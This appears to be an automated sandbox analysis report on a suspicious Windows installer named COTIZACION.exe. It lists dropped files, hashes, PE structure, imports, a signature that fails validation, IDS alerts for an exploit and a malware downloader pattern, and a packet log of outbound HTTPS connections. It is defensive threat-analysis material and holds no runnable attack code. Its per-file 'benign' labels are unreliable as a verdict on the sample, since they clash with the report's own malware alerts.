                                                                                              Preview:degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):482519
                                                                                              Entropy (8bit):1.2446382063037653
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
                                                                                              MD5:1D099F6122F4B7C8A78925726B59E5C3
                                                                                              SHA1:EEA154E31FF04CD1A2CED0193F7633ED219CFA47
                                                                                              SHA-256:1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
                                                                                              SHA-512:F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):384678
                                                                                              Entropy (8bit):7.648852242049378
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:V6g8qXtz3vFPEIP/Z5y1kvKYeTOGJcNGEZ4TGNUTb2Cy4biqdAR+a+:Yg8qdz/Fs2xPh9UTy4OqOR8
                                                                                              MD5:4CBE283FD9A441ECBBD647E4916EEBB2
                                                                                              SHA1:5C8FA8ABD72007C452171985F3D2E2BE3D2CDAE0
                                                                                              SHA-256:402DE88C6E98FB4B4DD1B50F8A629E519825E8FE25D341CA734A8648D1E44CF4
                                                                                              SHA-512:D52B174FA6FC6D2866B53164EA547721A94A805AC7D7693DD323A1B909FD467EA4AB6DF69BDD9F5B8811AF7839AE06B53EC88ADD548DE4C087582D9B8ABC3DA7
                                                                                              Malicious:false
                                                                                              Preview:....>>..................aaaa...88......w....A.nn.++.........---........................................6666666.ZZZZZ......oooo.[....k....yyy.......<<.....?......99.................H....N.8.....w...555....YY..H...$$...PPPP...........................(((........a..@l.;.<sU.].|...H....aG...(..x{r.Ac..\X.u.Z.d.._.h...IJ..8.#....o.f.b..<4...b.......F....=.T.3..QyE.....p.).e...&.L.....0..W.Kf........2.t.......o.Sp]...Y`...6..C..R....-...z....%.w.O.x.....f....G.g..N..*.... ....i.".^P.+.}j..@.m.....1...?kne~..5...VhvM...GR.D[..9f......f.f..0.....q.l.;.<sU.].|...H....aG...(..x{r.Ac..\X.4......./.Z.d.._.h...IJ..8.#.4...b.......F....=.T.3....#....r.l.FQyE.....p.).e...&.L.....0..W.K..t.......o.Sp]...Y`...6..C..R........f.....-...z....%.w.O..g..N..*... .f......5 ....i.".^P.+.}j..@.m.....1...?kne~..5...VhvM...GR...W..h.....%[..9{.....q.l.;.<sU.].|...H....aG......f....7.(..x{r.Ac..\X.u.Z.d.._.h...IJ..8.#.4...b.......F............=.T.3..QyE.....p.).e.....u.
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):392462
                                                                                              Entropy (8bit):1.241128723454179
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
                                                                                              MD5:F130EC3095DBECEDC791D8C58A59040C
                                                                                              SHA1:DAD2300B487F31F199520E1B41AB02B7D677B352
                                                                                              SHA-256:A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
                                                                                              SHA-512:8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
                                                                                              Malicious:false
                                                                                              Preview:..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):433786
                                                                                              Entropy (8bit):1.255949132332751
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
                                                                                              MD5:53FF1A157920AE92C9BF891D453D6B65
                                                                                              SHA1:B7BF3B7B16048F38132D8ACCA841130D73DB44C3
                                                                                              SHA-256:FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
                                                                                              SHA-512:E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
                                                                                              Malicious:false
                                                                                              Preview:......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):374902
                                                                                              Entropy (8bit):1.250991222921627
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
                                                                                              MD5:169115C751DDA5E021E8C86E8454B26D
                                                                                              SHA1:5A8254634C0C726BB18E42E626EAEB581D532DCD
                                                                                              SHA-256:ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
                                                                                              SHA-512:2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
                                                                                              Malicious:false
                                                                                              Preview:.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):288955
                                                                                              Entropy (8bit):1.2577770955280814
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
                                                                                              MD5:0B62328C4966F6B879B3C13B7FBD9C0D
                                                                                              SHA1:6DD81F12E739E81E06778067513ED1178A06AFC9
                                                                                              SHA-256:645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
                                                                                              SHA-512:2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
                                                                                              Malicious:false
                                                                                              Preview:.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................|............................................................[.................................................\.......................v...........o...................................m...........
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):151990
                                                                                              Entropy (8bit):4.6092449184746345
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:3HVXpvI/fnNmqleoynn5lDoEBFu60Pj9mK74o:lOnnNTQnwEBYzPL7F
                                                                                              MD5:3BF6794475FF09EB5AED2B0A0810247B
                                                                                              SHA1:1B00D2784EA48A65EE1334677047DB1124A8655C
                                                                                              SHA-256:4832E36CBC3343EE8A5EFE052EE3E4502F288055F023536CBA4B7B75F9C66BF1
                                                                                              SHA-512:03E759376F980731823284C203088329CE227C073AC8E6A4E1514C65A1B8E4DCAD1F869E273705D21F2C69C3726F506804FB1F27EAB5D6032013B27AFA96816A
                                                                                              Malicious:false
                                                                                              Preview:............[....?....OOOO..........]..=............KKK.R..www.................--..........T............xx...........................R.....k.....)........Q.........f.;.................r.CC.....66.z....... ..Y.................^^^.........\...............LLL..............44.!..................g.~~~~~.....ddd....YY......$...;.....................).....cc..............##...................{{{.777..........JJ....S...............t..jj.....7.............`.......0....L.MM..........HHHH...S.g..CC. ............g..................9...................N...ii...................w..11..|||||................EE................ .................DDDD..............u..@@@..**....j...........[[........ .....w...v...AA........g...................BB.3...........d.....oo...WWWW.. ...............,...........W........y....................#..................j....V......................*......K.............................................................]...........=..........................I...@@.................
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):340974
                                                                                              Entropy (8bit):1.254605943274635
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
                                                                                              MD5:49BE0E06F2E4F0CCFFB46426EE262642
                                                                                              SHA1:FF9C56C31A824E4CA087705C23D01D288FE34239
                                                                                              SHA-256:A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
                                                                                              SHA-512:27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
                                                                                              Malicious:false
                                                                                              Preview:.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................|. .....
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Entropy (8bit):7.815762039907831
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:COTIZACION.exe
                                                                                              File size:1'206'384 bytes
                                                                                              MD5:ad3b285c00819c0aa52bb492ce560bc1
                                                                                              SHA1:93dcb8eb3ac7fa43dc97cc36f203622adc195a8e
                                                                                              SHA256:26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9
                                                                                              SHA512:b0c06b3fb0366b45241757b32821ad2107494e2d922a9c18532fc2233aecb398a1e7da1f480e94a72039f36370143921f9498ca9bbf1320e243604b1d870c9ae
                                                                                              SSDEEP:24576:X4nhDoAFInEmQcT2qViRfrBNFI0ZNXLGQ7WczkxFnfbP9u:X+hkbnR/T2qCr5IiNXKQKczg4
                                                                                              TLSH:EF45232D3564C14FEA821B384FF6E3769D7AEC143D25912B77313B09EE7124C9E9A260
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.
                                                                                              Icon Hash:873335651170390f
                                                                                              Entrypoint:0x4036da
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:1
                                                                                              File Version Major:5
                                                                                              File Version Minor:1
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:1
                                                                                              Import Hash:3f91aceea750f765ef2ba5d9988e6a00
                                                                                              Signature Valid:false
                                                                                              Signature Issuer:CN=Queenite, O=Queenite, L=Saint-Priest-la-Roche, C=FR
                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                              Error Number:-2146762487
                                                                                              Not Before, Not After
                                                                                              • 17/03/2024 04:32:03 17/03/2027 04:32:03
                                                                                              Subject Chain
                                                                                              • CN=Queenite, O=Queenite, L=Saint-Priest-la-Roche, C=FR
                                                                                              Version:3
                                                                                              Thumbprint MD5:D5F780643C6D961B02C970DE0E3E5FC0
                                                                                              Thumbprint SHA-1:3B417C0BA2B66A5F87DD2B4BD8DC4BB7CBA38C5A
                                                                                              Thumbprint SHA-256:7066DFF47C4033ABEC8C429A87AFF4AB5060ED26AFF6B95419554F6EB19AFCB0
                                                                                              Serial:393EB7EDE7DF3B338344C0D3BF2685CC21FD4235
                                                                                              Instruction
                                                                                              sub esp, 000003ECh
                                                                                              push ebx
                                                                                              push ebp
                                                                                              push esi
                                                                                              push edi
                                                                                              xor ebx, ebx
                                                                                              mov edi, 00408528h
                                                                                              push 00008001h
                                                                                              mov dword ptr [esp+14h], ebx
                                                                                              mov ebp, ebx
                                                                                              call dword ptr [00408170h]
                                                                                              mov esi, dword ptr [004080ACh]
                                                                                              lea eax, dword ptr [esp+2Ch]
                                                                                              xorps xmm0, xmm0
                                                                                              mov dword ptr [esp+40h], ebx
                                                                                              push eax
                                                                                              movlpd qword ptr [esp+00000144h], xmm0
                                                                                              mov dword ptr [esp+30h], 0000011Ch
                                                                                              call esi
                                                                                              test eax, eax
                                                                                              jne 00007F6AF126D939h
                                                                                              lea eax, dword ptr [esp+2Ch]
                                                                                              mov dword ptr [esp+2Ch], 00000114h
                                                                                              push eax
                                                                                              call esi
                                                                                              push 00000053h
                                                                                              pop eax
                                                                                              mov dl, 04h
                                                                                              mov byte ptr [esp+00000146h], dl
                                                                                              cmp word ptr [esp+40h], ax
                                                                                              jne 00007F6AF126D913h
                                                                                              mov eax, dword ptr [esp+5Ah]
                                                                                              add eax, FFFFFFD0h
                                                                                              mov word ptr [esp+00000140h], ax
                                                                                              jmp 00007F6AF126D90Dh
                                                                                              xor eax, eax
                                                                                              jmp 00007F6AF126D8F4h
                                                                                              mov dl, byte ptr [esp+00000146h]
                                                                                              cmp dword ptr [esp+30h], 0Ah
                                                                                              jnc 00007F6AF126D90Dh
                                                                                              movzx eax, word ptr [esp+38h]
                                                                                              mov dword ptr [esp+38h], eax
                                                                                              jmp 00007F6AF126D906h
                                                                                              mov eax, dword ptr [esp+38h]
                                                                                              mov dword ptr [007A8638h], eax
                                                                                              movzx eax, byte ptr [esp+30h]
                                                                                              shl ax, 0008h
                                                                                              movzx ecx, ax
                                                                                              movzx eax, byte ptr [esp+34h]
                                                                                              or ecx, eax
                                                                                              movzx eax, byte ptr [esp+00000140h]
                                                                                              shl ax, 0008h
                                                                                              shl ecx, 10h
                                                                                              movzx eax, word ptr [eax]
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8a000xa0.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3db0000x3e910.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1256380x1238.data
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x6c0b0x6e009178309eee1a86dc5ef945d6826a6897False0.6605823863636363data6.398414552532143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x80000x18960x1a000885e83a553c38819d1fab2908ca0cf5False0.4307391826923077data4.86610208699674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0xa0000x39e6400x2005c0f03a1a77f205400c2cbabec9976c4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .ndata0x3a90000x320000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x3db0000x3e9100x3ea002690c3c0c1de505f961321c7e2d6da34False0.6915076097804391data6.574790239627466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x3db3880x16482PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000394451383867
                                                                                              RT_ICON0x3f18100x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.486498876138649
                                                                                              RT_ICON0x4020380x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5308492747529956
                                                                                              RT_ICON0x40b4e00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5497227356746766
                                                                                              RT_ICON0x4109680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5415682569674067
                                                                                              RT_ICON0x414b900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5884854771784233
                                                                                              RT_ICON0x4171380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6179643527204502
                                                                                              RT_ICON0x4181e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6668032786885246
                                                                                              RT_ICON0x418b680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7287234042553191
                                                                                              RT_DIALOG0x418fd00x100dataEnglishUnited States0.5234375
                                                                                              RT_DIALOG0x4190d00x11cdataEnglishUnited States0.6056338028169014
                                                                                              RT_DIALOG0x4191f00xc4dataEnglishUnited States0.5918367346938775
                                                                                              RT_DIALOG0x4192b80x60dataEnglishUnited States0.7291666666666666
                                                                                              RT_GROUP_ICON0x4193180x84Targa image data - Map 32 x 25730 x 1 +1EnglishUnited States0.7348484848484849
                                                                                              RT_VERSION0x4193a00x220dataEnglishUnited States0.5110294117647058
                                                                                              RT_MANIFEST0x4195c00x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5529131985731273
                                                                                              DLLImport
                                                                                              ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                                                                              SHELL32.dllShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                                                                                              ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                                                                              COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                              USER32.dllDispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                                                                                              GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
                                                                                              KERNEL32.dllWriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-11-05T12:37:29.294568+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.949797TCP
                                                                                              2024-11-05T12:38:10.074857+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.964762TCP
                                                                                              2024-11-05T12:38:31.323411+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.964763142.250.185.238443TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 5, 2024 12:38:29.899483919 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:29.899528027 CET44364763142.250.185.238192.168.2.9
                                                                                              Nov 5, 2024 12:38:29.899599075 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:29.910176039 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:29.910196066 CET44364763142.250.185.238192.168.2.9
                                                                                              Nov 5, 2024 12:38:30.791064978 CET44364763142.250.185.238192.168.2.9
                                                                                              Nov 5, 2024 12:38:30.791318893 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:30.791861057 CET44364763142.250.185.238192.168.2.9
                                                                                              Nov 5, 2024 12:38:30.791949034 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:30.864016056 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:30.864053011 CET44364763142.250.185.238192.168.2.9
                                                                                              Nov 5, 2024 12:38:30.864485979 CET44364763142.250.185.238192.168.2.9
                                                                                              Nov 5, 2024 12:38:30.864540100 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:30.869024992 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:30.915330887 CET44364763142.250.185.238192.168.2.9
                                                                                              Nov 5, 2024 12:38:31.323402882 CET44364763142.250.185.238192.168.2.9
                                                                                              Nov 5, 2024 12:38:31.323471069 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:31.323641062 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:31.323683023 CET44364763142.250.185.238192.168.2.9
                                                                                              Nov 5, 2024 12:38:31.323729992 CET64763443192.168.2.9142.250.185.238
                                                                                              Nov 5, 2024 12:38:31.346107006 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:31.346160889 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:31.346231937 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:31.346504927 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:31.346523046 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:32.211996078 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:32.212146044 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:32.216495991 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:32.216514111 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:32.216792107 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:32.217255116 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:32.217643976 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:32.259341955 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.746994972 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.747159004 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.755695105 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.755806923 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.863961935 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.864041090 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.864063978 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.864082098 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.864105940 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.864125967 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.868623972 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.868731976 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.873490095 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.873580933 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.873593092 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.873651028 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.878256083 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.878314018 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.878320932 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.878377914 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.884512901 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.884593010 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.884613991 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.884668112 CET64764443192.168.2.9142.250.185.161
                                                                                              Nov 5, 2024 12:38:34.980891943 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.980954885 CET44364764142.250.185.161192.168.2.9
                                                                                              Nov 5, 2024 12:38:34.980988979 CET64764443192.168.2.9142.250.185.161
